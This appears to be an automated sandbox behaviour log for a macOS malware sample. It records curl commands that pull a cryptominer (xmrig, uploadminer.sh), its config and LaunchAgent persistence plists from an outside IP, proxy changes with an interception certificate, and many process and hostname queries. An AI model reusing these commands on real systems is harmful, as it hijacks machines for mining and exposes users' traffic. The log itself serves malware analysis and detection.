Source: /bin/bash (PID: 551) | Curl executable: /usr/bin/curl -> curl 46.226.108.171:80/sample.zip -o sample.zip | Jump to behavior |
Source: /bin/sh (PID: 596) | Curl executable: /usr/bin/curl -> curl -o uploadminer.sh http://46.226.108.171/uploadminer.sh | Jump to behavior |
Source: /bin/sh (PID: 607) | Curl executable: /usr/bin/curl -> curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem | Jump to behavior |
Source: /bin/sh (PID: 608) | Curl executable: /usr/bin/curl -> curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist | Jump to behavior |
Source: /bin/sh (PID: 609) | Curl executable: /usr/bin/curl -> curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist | Jump to behavior |
Source: /bin/sh (PID: 612) | Curl executable: /usr/bin/curl -> curl -o config.json http://46.226.108.171/config.json | Jump to behavior |
Source: /bin/sh (PID: 613) | Curl executable: /usr/bin/curl -> curl -o xmrig http://46.226.108.171/xmrig | Jump to behavior |
Source: Submitted file: TnrhsyteX1.app | CodeResources XML file: CodeResources |
Source: Submitted file: TnrhsyteX1.app | CodeResources XML file: CodeResources |
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources |
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources |
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources |
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources |
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources |
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources |
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources |
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources |
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources |
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources |
Source: /usr/sbin/networksetup (PID: 567) | XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist-new | |
Source: /bin/cp (PID: 568) | XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old | |
Source: /usr/sbin/networksetup (PID: 569) | XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist-new | Jump to dropped file |
Source: /bin/cp (PID: 570) | XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old | |
Source: /usr/bin/curl (PID: 574) | XML plist file created: /Users/henry/Library/LaunchAgents/com.apple.rig.plist | |
Source: /usr/bin/curl (PID: 575) | XML plist file created: /Users/henry/Library/LaunchAgents/com.proxy.initialize.plist | |
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/_CodeSignature/CodeResources | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/Resources/Info.plist | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | Binary plist file created: /Users/henry/sample/sample.app/Contents/Resources/Base.lproj/MainMenu.nib | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/_CodeSignature/CodeResources | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/Resources/Info.plist | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/_CodeSignature/CodeResources | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/Resources/Info.plist | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/_CodeSignature/CodeResources | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/Resources/Info.plist | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v6.bundle/Versions/A/_CodeSignature/CodeResources | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v6.bundle/Versions/A/Resources/Info.plist | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Info.plist | Jump to dropped file |
Source: /bin/cp (PID: 604) | XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old | |
Source: /bin/cp (PID: 606) | XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old | Jump to dropped file |
Source: /usr/bin/curl (PID: 608) | XML plist file created: /Users/henry/Library/LaunchAgents/com.apple.rig.plist | Jump to dropped file |
Source: /usr/bin/curl (PID: 609) | XML plist file created: /Users/henry/Library/LaunchAgents/com.proxy.initialize.plist | Jump to dropped file |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.556 -> queries PID 556 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.555 -> queries PID 555 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.553 -> queries PID 553 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.552 -> queries PID 552 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.551 -> queries PID 551 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.550 -> queries PID 550 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.548 -> queries PID 548 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.547 -> queries PID 547 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.546 -> queries PID 546 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.537 -> queries PID 537 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.535 -> queries PID 535 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.529 -> queries PID 529 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.528 -> queries PID 528 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.527 -> queries PID 527 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.499 -> queries PID 499 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.496 -> queries PID 496 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.494 -> queries PID 494 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.493 -> queries PID 493 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.466 -> queries PID 466 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.449 -> queries PID 449 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.428 -> queries PID 428 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.426 -> queries PID 426 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.425 -> queries PID 425 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.424 -> queries PID 424 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.423 -> queries PID 423 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.422 -> queries PID 422 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.421 -> queries PID 421 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.414 -> queries PID 414 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.413 -> queries PID 413 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.407 -> queries PID 407 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.403 -> queries PID 403 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.402 -> queries PID 402 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.401 -> queries PID 401 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.400 -> queries PID 400 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.399 -> queries PID 399 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.392 -> queries PID 392 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.391 -> queries PID 391 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.390 -> queries PID 390 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.386 -> queries PID 386 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.384 -> queries PID 384 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.383 -> queries PID 383 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.382 -> queries PID 382 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.380 -> queries PID 380 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.379 -> queries PID 379 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.378 -> queries PID 378 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.375 -> queries PID 375 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.374 -> queries PID 374 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.373 -> queries PID 373 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.369 -> queries PID 369 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.368 -> queries PID 368 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.367 -> queries PID 367 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.366 -> queries PID 366 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.365 -> queries PID 365 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.364 -> queries PID 364 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.363 -> queries PID 363 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.362 -> queries PID 362 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.361 -> queries PID 361 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.357 -> queries PID 357 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.356 -> queries PID 356 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.355 -> queries PID 355 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.354 -> queries PID 354 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.353 -> queries PID 353 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.352 -> queries PID 352 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.350 -> queries PID 350 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.349 -> queries PID 349 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.347 -> queries PID 347 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.346 -> queries PID 346 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.344 -> queries PID 344 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.342 -> queries PID 342 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.341 -> queries PID 341 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.340 -> queries PID 340 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.339 -> queries PID 339 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.338 -> queries PID 338 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.336 -> queries PID 336 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.329 -> queries PID 329 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.327 -> queries PID 327 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.326 -> queries PID 326 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.325 -> queries PID 325 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.324 -> queries PID 324 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.322 -> queries PID 322 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.321 -> queries PID 321 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.319 -> queries PID 319 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.318 -> queries PID 318 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.317 -> queries PID 317 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.316 -> queries PID 316 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.314 -> queries PID 314 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.313 -> queries PID 313 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.312 -> queries PID 312 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.311 -> queries PID 311 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.310 -> queries PID 310 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.309 -> queries PID 309 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.308 -> queries PID 308 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.307 -> queries PID 307 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.306 -> queries PID 306 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.305 -> queries PID 305 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.304 -> queries PID 304 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.303 -> queries PID 303 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.302 -> queries PID 302 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.301 -> queries PID 301 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.299 -> queries PID 299 | Jump to behavior |
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.297 -> queries PID 297 | Jump to behavior |
Source: /bin/bash (PID: 548) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 553) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 557) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 558) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 559) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 566) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 568) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 570) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 582) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 587) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 588) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 595) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 602) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 604) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 606) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |